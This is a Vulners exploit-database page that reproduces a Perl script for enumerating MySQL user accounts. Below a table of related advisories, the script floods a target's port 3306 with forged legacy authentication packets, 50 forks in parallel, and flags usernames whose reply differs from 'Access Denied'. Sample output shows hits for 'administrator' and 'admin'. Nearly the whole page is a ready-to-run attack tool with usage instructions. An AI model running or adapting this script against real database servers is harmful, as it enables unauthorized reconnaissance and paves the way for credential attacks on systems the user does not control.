Vulners
Lucene search
Oracle MySQL User Account Enumeration Utility
| Reporter | Title | Published | Views | Family All 281 |
|---|---|---|---|---|
 | Security fix for the ALT Linux 8 package mariadb version April | 1 Apr 201300:00 | – | altlinux |
 | Oracle MySQL 5.5.x < 5.5.39 / 5.6.x < 5.6.20 Multiple Vulnerabilities | 16 Sep 201400:00 | – | nessus |
| CentOS 5 : mysql55-mysql (CESA-2014:1859) | 18 Nov 201400:00 | – | nessus |
| CentOS 7 : mariadb (CESA-2014:1861) | 18 Nov 201400:00 | – | nessus |
| Debian DSA-3054-1 : mysql-5.5 - security update | 21 Oct 201400:00 | – | nessus |
| Fedora 20 : mariadb-galera-5.5.40-2.fc20 (2014-14791) | 3 Dec 201400:00 | – | nessus |
| FreeBSD : mysql/mariadb/percona server -- multiple vulnerabilities (8c773d7f-6cbb-11e2-b242-c8600054b392) | 4 Feb 201300:00 | – | nessus |
| GLSA-201308-06 : MySQL: Multiple vulnerabilities | 30 Aug 201300:00 | – | nessus |
| Mandriva Linux Security Advisory : mariadb (MDVSA-2013:102) | 20 Apr 201300:00 | – | nessus |
| Mandriva Linux Security Advisory : mariadb (MDVSA-2015:091) | 30 Mar 201500:00 | – | nessus |
10
`# MySQL User Account Enumeration Utility
# When an attacker authenticates using an incorrect password
# with the old authentication mechanism from mysql 4.x and below to a mysql 5.x server
# the mysql server will respond with a different message than Access Denied, what makes
# User Account Enumeration possible.
# The Downside is that the attacker has to reconnect for each user enumeration attempt
#20000 user accounts in 7 minutes
#Mon Jan 16 09:00:18 UTC 2012
#Mon Jan 16 09:07:26 UTC 2012
#root@vs2067037:~# wc -l MEDIUM.LST
#21109 MEDIUM.LST
#A usernames.txt wordlist is included in this package
#examples:
#root@vs2067037:~# perl mysqlenum.pl host usernames.txt
#
#[*] HIT! -- USER EXISTS: administrator@host
#
#root@vs2067037:~# perl mysqlenum.pl host usernames.txt
#
#[*] HIT! -- USER EXISTS: admin@host
#
use IO::Socket;
use Parallel::ForkManager;
$|=1;
if ($#ARGV != 1) {
print "Usage: mysqlenumerate.pl <target> <wordlist>\n";
exit;
}
$target = $ARGV[0];
$wordlist = $ARGV[1];
$numforks = 50;
$pm = new Parallel::ForkManager($numforks);
open FILE,"<$wordlist";
unlink '/tmp/cracked';
@users = ();
$k=0;
while(<FILE>) {
chomp;
$_ =~ s/\r//g;
$users[$k++] = $_;
}
close FILE;
$k2 = 0;
for(;;) {
for ($k=0;$k<$numforks;$k++) {
$k2++;
if (($k2 > $#users) or (-e '/tmp/cracked')) {
exit;
}
my $pid = $pm->start and next;
$user = $users[$k2];
goto further;
again:
print "Connect Error\n";
further:
my $sock = IO::Socket::INET->new(PeerAddr => $target,
PeerPort => '3306',
Proto => 'tcp') || goto again;
recv($sock, $buff, 1024, 0);
$buf = "\x00\x00\x01\x8d\x00\x00\x00\x00$user\x00\x50".
"\x4e\x5f\x51\x55\x45\x4d\x45\x00";
$buf = chr(length($buf)-3). $buf;
print $sock $buf;
$res = recv($sock, $buff, 1024, 0);
close($sock);
if ($k2 % 100 == 0) {
print $buff."\n";
}
if (substr($buff, 7, 6) eq "Access") {$pm->finish;next;}
unless (-e '/tmp/cracked') {
open FILE, ">/tmp/cracked";
close FILE;
print "\n[*] HIT! -- USER EXISTS: $user\@$target\n";
open FILE, ">jackpot";
print FILE "\n[*] HIT! -- USER EXISTS: $user\@$target\n";
exit;
}
}
$pm->wait_all_children;
}
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Dec 2012 00:00Current
0.3Low risk
Vulners AI Score0.3
EPSS0.14784